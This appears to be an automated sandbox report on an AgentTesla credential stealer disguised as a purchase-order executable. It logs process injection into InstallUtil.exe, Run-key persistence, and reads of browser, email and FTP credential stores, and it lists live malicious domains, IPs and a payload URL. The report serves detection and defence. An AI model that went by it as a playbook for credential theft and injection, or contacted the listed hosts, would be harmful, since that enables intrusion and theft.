                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000 protect: page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 770000
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 772000
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7AC000
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7AE000
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 429008
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 628008
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 819008
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Queries volume information: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe VolumeInformation
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Queries volume information: C:\Users\user\AppData\Roaming\Xpnzea.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match File source: dump.pcap, type: PCAP
                        Source: Yara match File source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3280, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4836, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3848, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara match, File source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 3280, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match, File source: dump.pcap, type: PCAP
                        Source: Yara match, File source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 3280, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 4836, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 3848, type: MEMORYSTR

                        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                        | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
                        | Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                        | Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 12 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                        | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                        | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                        | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                        | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

                        [Behavior graph] Behavior Graph ID: 1523145, Sample: PO_9876563647-FLOWTRONIX (F..., Startdate: 01/10/2024, Architecture: WINDOWS, Score: 100

                        | Source | Detection | Scanner | Label |
                        | --- | --- | --- | --- |
                        | PO_9876563647-FLOWTRONIX (FT)UUE.exe | 47% | ReversingLabs | Win32.Trojan.AgentTesla |
                        | PO_9876563647-FLOWTRONIX (FT)UUE.exe | 33% | Virustotal | |
                        | PO_9876563647-FLOWTRONIX (FT)UUE.exe | 100% | Joe Sandbox ML | |

                        | Source | Detection | Scanner | Label |
                        | --- | --- | --- | --- |
                        | C:\Users\user\AppData\Roaming\Xpnzea.exe | 100% | Joe Sandbox ML | |
                        | C:\Users\user\AppData\Roaming\Xpnzea.exe | 47% | ReversingLabs | Win32.Trojan.AgentTesla |
                        | C:\Users\user\AppData\Roaming\Xpnzea.exe | 33% | Virustotal | |

                        No Antivirus matches

                        | Source | Detection | Scanner | Label |
                        | --- | --- | --- | --- |
                        | wymascensores.com | 3% | Virustotal | |
                        | ftp.alternatifplastik.com | 3% | Virustotal | |

                        | Source | Detection | Scanner | Label |
                        | --- | --- | --- | --- |
                        | https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
                        | https://account.dyn.com/ | 0% | URL Reputation | safe |
                        | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                        | https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
                        | https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |
                        | https://github.com/mgravell/protobuf-neti | 0% | Virustotal | |
                        | https://wymascensores.com/servex/Evzbwt.mp3 | 4% | Virustotal | |
                        | https://wymascensores.com | 6% | Virustotal | |
                        | http://ftp.alternatifplastik.com | 3% | Virustotal | |
                        | https://github.com/mgravell/protobuf-net | 0% | Virustotal | |
                        | https://github.com/mgravell/protobuf-netJ | 0% | Virustotal | |

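                        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                        | --- | --- | --- | --- | --- | --- |
                        | wymascensores.com | 67.212.175.162 | true | true | | unknown |
                        | ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown |

                        | Name | Malicious | Antivirus Detection | Reputation |
                        | --- | --- | --- | --- |
                        | https://wymascensores.com/servex/Evzbwt.mp3 | true | | unknown |
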
                        | Name | Source | Malicious | Antivirus Detection | Reputation |
                        | --- | --- | --- | --- | --- |
                        | https://github.com/mgravell/protobuf-net | PO_9876563647-FLOWTRONIX (FT)UUE.exe | false | | unknown |
                        | https://github.com/mgravell/protobuf-neti | PO_9876563647-FLOWTRONIX (FT)UUE.exe | false | | unknown |
                        | https://stackoverflow.com/q/14436606/23354 | PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | false | URL Reputation: safe | unknown |
                        | https://account.dyn.com/ | PO_9876563647-FLOWTRONIX (FT)UUE.exe, InstallUtil.exe, Xpnzea.exe | false | URL Reputation: safe | unknown |
                        | https://github.com/mgravell/protobuf-netJ | PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | false | | unknown |
                        | https://wymascensores.com | PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | false | | unknown |
                        | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO_9876563647-FLOWTRONIX (FT)UUE.exe, InstallUtil.exe, Xpnzea.exe | false | URL Reputation: safe | unknown |
                        | https://stackoverflow.com/q/11564914/23354; | PO_9876563647-FLOWTRONIX (FT)UUE.exe | false | URL Reputation: safe | unknown |
                        | https://stackoverflow.com/q/2152978/23354 | PO_9876563647-FLOWTRONIX (FT)UUE.exe | false | URL Reputation: safe | unknown |
                        | http://ftp.alternatifplastik.com | InstallUtil.exe | false | | unknown |

                        | IP | Domain | Country | ASN | ASN Name | Malicious |
                        | --- | --- | --- | --- | --- | --- |
                        | 67.212.175.162 | wymascensores.com | United States | 32475 | SINGLEHOP-LLCUS | true |
                        | 5.2.84.236 | ftp.alternatifplastik.com | Turkey | 3188 | ALASTYRTR | true |

                        Joe Sandbox version: 41.0.0 Charoite
                        Analysis ID: 1523145
                        Start date and time: 2024-10-01 07:30:28 +02:00
                        Joe Sandbox product: CloudBasic
                        Overall analysis duration: 0h 8m 32s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed: 14
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Sample name: PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Detection: MAL
                        Classification: mal100.troj.spyw.evad.winEXE@9/2@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 89%
                        • Number of executed functions: 458
                        • Number of non-executed functions: 28
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        | Time | Type | Description |
                        | --- | --- | --- |
                        | 07:31:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xpnzea C:\Users\user\AppData\Roaming\Xpnzea.exe |
                        | 07:31:40 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xpnzea C:\Users\user\AppData\Roaming\Xpnzea.exe |

                        | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                        | --- | --- | --- | --- | --- |
                        | 67.212.175.162 | BITUMEN_60-70_-_JUMBO_Specification.exe | malicious | FormBook, NSISDropper | www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp |
                        | 67.212.175.162 | EL-515-_HEAT_TRACING.exe | malicious | FormBook, NSISDropper | www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN |
                        | 5.2.84.236 | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | |
                        | 5.2.84.236 | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | |
                        | 5.2.84.236 | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | |
                        | 5.2.84.236 | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer | |
                        | 5.2.84.236 | OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe | malicious | AgentTesla | |
                        | 5.2.84.236 | Product Specification Details 8576534-872.exe | malicious | AgentTesla | |
                        | 5.2.84.236 | Teklif 8822321378 .exe | malicious | AgentTesla, PureLog Stealer | |
                        | 5.2.84.236 | https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=http://5ln.gpr.carfield.com.tr./?YYY%3A%2F%2F%23.bWljaGFlbC5keWtlc0BjZXFsZC5vcmcuYXU= | malicious | Unknown | |
                        | 5.2.84.236 | KAL_00192839403-28122021.cmd.exe | malicious | AgentTesla | |
                        | 5.2.84.236 | Halkbank.cmd.exe | malicious | AgentTesla | |

                        | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                        | --- | --- | --- | --- | --- |
                        | wymascensores.com | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 67.212.175.162 |
                        | wymascensores.com | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 67.212.175.162 |
                        | wymascensores.com | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | 67.212.175.162 |
                        | wymascensores.com | RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 67.212.175.162 |
                        | wymascensores.com | Su documento de env#U00edo--------pdf.exe | malicious | Unknown | 67.212.175.162 |
                        | wymascensores.com | Su documento de env#U00edo--------pdf.exe | malicious | Unknown | 67.212.175.162 |
                        | wymascensores.com | 1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exe | malicious | AgentTesla | 67.212.175.162 |
                        | wymascensores.com | Teklif 8822321378 .exe | malicious | AgentTesla, PureLog Stealer | 67.212.175.162 |
                        | wymascensores.com | rDocumentodeembarque.exe | malicious | AgentTesla, PureLog Stealer | 67.212.175.162 |
                        | wymascensores.com | ORGB.exe | malicious | AgentTesla | 67.212.175.162 |
                        | ftp.alternatifplastik.com | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236 |
                        | ftp.alternatifplastik.com | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 5.2.84.236 |
                        | ftp.alternatifplastik.com | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | 5.2.84.236 |
                        | ftp.alternatifplastik.com | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer | 5.2.84.236 |
                        | ftp.alternatifplastik.com | OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe | malicious | AgentTesla | 5.2.84.236 |
                        | ftp.alternatifplastik.com | Product Specification Details 8576534-872.exe | malicious | AgentTesla | 5.2.84.236 |

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            SINGLEHOP-LLCUShttps://sandbox-2.digital68.com/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            https://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            http://dev-bdvonlinecreditos.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            https://dev-bdvemprendeven.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            http://dev-cdn370.pantheonsite.ioGet hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                            • 172.96.187.60
                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 67.212.175.162
                                            ALASTYRTRRichardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                            • 5.2.84.221
                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                            • 5.2.84.221
                                            Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 5.2.84.236
                                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                            • 5.2.85.36
                                            OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            http://www.idecon.com.trGet hashmaliciousUnknownBrowse
                                            • 5.2.84.231
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0e2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            invoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            No context
                                            Process:C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):537600
                                            Entropy (8bit):5.449510671154793
                                            Encrypted:false
                                            SSDEEP:12288:zjEd+1wfcT78ZE9mBMnliO+CDbX1AlVtFtu6B:zjEdRfcT78ZE9munli/CDbXulDHu6B
